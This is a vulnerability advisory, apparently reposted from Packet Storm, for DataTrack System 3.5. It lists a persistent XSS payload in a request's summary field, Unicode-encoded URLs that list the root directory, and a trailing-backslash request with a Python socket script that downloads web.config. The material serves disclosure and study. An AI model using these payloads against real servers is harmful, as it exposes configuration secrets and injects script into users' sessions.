DataTrack System version 3.5 suffers from a persistent cross site scripting vulnerability.
b26e431c41faa90e692db047d4babce4e4f22b4a3f9015b26d0c293b9a73e8f9#============================================================================================================#
# _ _ __ __ __ _______ _____ __ __ _____ _ _ _____ __ __ #
# /_/\ /\_\ /\_\ /\_\ /\_\ /\_______)\ ) ___ ( /_/\__/\ ) ___ ( /_/\ /\_\ /\_____\/_/\__/\ #
# ) ) )( ( ( \/_/( ( ( ( ( ( \(___ __\// /\_/\ \ ) ) ) ) )/ /\_/\ \ ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\ \ \_\ / / / / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/ #
# \ \ / \ / // / // / /__ / / /__ ( ( ( \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ / \ / // /__/_\ \ \ \ \ #
# )_) /\ (_(( (_(( (_____(( (_____( \ \ \ \ \/_\/ / )_) ) \ \/_\/ / )_) /\ (_(( (_____\)_) ) \ \ #
# \_\/ \/_/ \/_/ \/_____/ \/_____/ /_/_/ )_____( \_\/ )_____( \_\/ \/_/ \/_____/\_\/ \_\/ #
# #
#============================================================================================================#
# #
# Vulnerability............Persistent Cross-Site Scripting #
# Directory Disclosure #
# Configuration Disclosure #
# Source Disclosure #
# Software.................DataTrack System 3.5 #
# Download.................http://www.magnoware.com/Downloads.aspx #
# Date.....................5/17/10 #
# #
#============================================================================================================#
# #
# Site.....................http://cross-site-scripting.blogspot.com/ #
# Email....................john.leitch5@gmail.com #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# User submitted data is not HTML entity encoded before it is rendered. #
# #
# #
# ##Exploit## #
# #
# Login using the web client and submit a request with summary set to <script>alert(0)</script>. Navigate #
# to My History to see the result. #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# The contents of the root directory can be listed by using a specially crafted URL. #
# #
# #
# ##Exploit## #
# #
# %u0085 #
# %u00A0 #
# #
# #
# ##Proof of Concept## #
# #
# http://localhost/%u0085/ #
# http://localhost/%u00A0/ #
# #
#============================================================================================================#
# #
# ##Description## #
# #
# Forbidden file types (e.g. ascx, config) can be downloaded by appending a backslash to the filename. #
# #
# #
# ##Exploit## #
# #
# GET /web.config\ HTTP/1.1 #
# Host: localhost #
# #
# #
# ##Proof of Concept## #
# #
import socket
host ='localhost'
port = 80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('GET /web.config\ HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')
while 1:
response = s.recv(8192)
if not response: break
print response
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed